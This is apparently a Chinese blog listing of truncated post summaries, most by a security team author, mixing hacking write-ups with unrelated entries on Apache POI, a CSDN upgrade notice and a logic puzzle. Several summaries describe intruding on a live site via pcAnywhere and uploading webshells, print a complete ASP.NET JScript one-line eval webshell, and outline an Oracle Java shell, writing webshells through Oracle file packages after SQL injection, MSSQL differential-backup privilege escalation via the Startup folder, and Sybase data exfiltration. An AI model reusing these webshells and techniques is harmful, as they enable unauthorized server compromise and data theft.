摘要： 今天AMXSA刚刚拿下一个站PCANYWHERE本来打算上传WEBSHELL的！谁知道跟我说 resin的机器报告错误！晕死！测试了所有的JSP-WEBSHELL都不支持 郁闷啊！报告了一大堆错误java.io.IOException: write() forbidden after writer is closed at com.caucho.jsp.JspWriterAdapter.write(JspWriterAdapter.java:103) at _jsp._err__jsp._jspService(err.jsp:7) at com.caucho.jsp.JavaPage.ser. 阅读全文

摘要： 很早之前就知道APACHE 子项目POI可以操作WORD EXCEL 等...但是一直都没去试！本来以为他是利用JNI调用本地MS的ACTIVEX呢！原来直接操作2进制文件！牛啊~呵呵~~ 刚刚好今天项目需要把EXCEL导到数据库！那就做了个简单的~加载3个JAR包 poi-3.0.1 poi-contrib-3.0.1 poi-scratchpad-3.0.1HSSFWorkbook 就是一个xls对象！首先需要创建一个HSSFWorkbook 对象HSSFWorkbook xls=new HSSFWorkbook(new POIFSFileSystem(new FileInputStrea 阅读全文

摘要： Author : kj021320Team : I.S.T.O信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)服务器端 一句话为<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>这个一句话不用说了！我之前已经发表文章讲解过！client端HTML页面代码如下<html> 阅读全文

摘要： 亲爱的CSDN博友们： 为了让大家在CSDN体验到更贴心的服务，博客开发小组对我们的服务进行了改善，完成了2.0到3.0的升级开发。 下面是主要的改善功能和新增服务1. 彻底解决blog稳定性问题面对不断增加的访问量，CSDN博客开发团队充满信心。通过对稳定性的持续改善，CSDN blog已经能够为大家提供更加舒适的阅读和写作体验，再也不用担心无法正常访问的问题了。2. 加入文章指数评价系统文章指数评价系统是CSDN博客新推出的一项服务，通过文章的点击量、评论数、网摘收录量、以及文章的类型和长度对文章的质量做出客观的评判，让优秀的文章的作者获得更多的展现机会。3. 加入“顶”文章的功能看到好文 阅读全文

摘要： 首先在ORACLE数据库建立JAVA对象, 这个版本的SQLJ-SHELL 只能支持正向连接,反向连接的时候有BUG 不建议使用,不知道是ORA支持JAVA的问题还是个人能力有限...要是有更好的方法可以方便交流QQ:282720807create or replace and compile java source named isto asimport java.io.*;import java.net.*;public class ISTO{ //author: kj021320 //team: I.S.T.Opublic static String listFolder(String 阅读全文

摘要： author : kj021320team: I.S.T.O转载需注明作者,未经作者同意,不得用于任何形式的商业活动一般我们通过函数注射以后 获得ORA的DBA权限 那么我们就得对本地文件进行操作！要是WEB跟ORA是同一个机器~那就更方便于我们拿更多的权限了~或者对本地写webshell下面是采用ORA 自带的文件访问包 操作本地文件！ 前提是你必须要知道WEBSITE的物理地址以下是一个简单例子--首先我们得先建立一个 ORACLE的目录对象 指向 C:/create or replace directory IST0_DIR as 'C:/';--然后我们对这个目录对象进 阅读全文

摘要： Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though it pays to be prepared...Below are some tabulated notes on how to do many of thing you'd normally do via SQL injection. All tests were performed on DB2 8.2 阅读全文

摘要： MSSQL差异备份取系统权限TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的！既然如此就拿出来大家分享吧！MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码让系统执行了之后自动提升权限 或者添加管理员吗？ 答案当然可以了,kj021320测试了N次之后跟你说！那么我们得考虑文件摆放的位置~什么地方系统会运行呢？这个其实算是废话吧！大家不用想都知道 通用地方 C:/Documents and Settings/All Users/「开始」菜单/程序/启动呵呵位置有了！　那么我们备份什么文件让系统能执行的呢？这个是第一个关键点~！E 阅读全文

摘要： 5个囚犯，分别按1-5号在装有100颗绿豆的麻袋抓绿豆，规定每人至少抓一颗，而抓得最多和最少的人将被处死，而且，他们之间不能交流，但在抓的时候，可以摸出剩下的豆子数。问他们中谁的存活机率最大？？提示：1，他们都是很聪明的人2，他们的原则是先求保命，再去多杀人3，100颗不必都分完4，若有重复的情况，则也算最大或最小，一并处死 阅读全文

摘要： 一般MSSQL可以给我们使用openrowset来返回数据 而SYBASE我们可以使用syb_sendmsg方法！不过这个方法主要是采用UDP传输数据所以你得开发一个程序监听.OK 那我们首先看看SYBASE的系统设置信息吧！以下是我copy人家的 默认配置信息-----------EXEC sp_configure 'abstract plan cache',0goEXEC sp_configure 'abstract plan dump',0goEXEC sp_configure 'abstract plan load',0goEXEC sp 阅读全文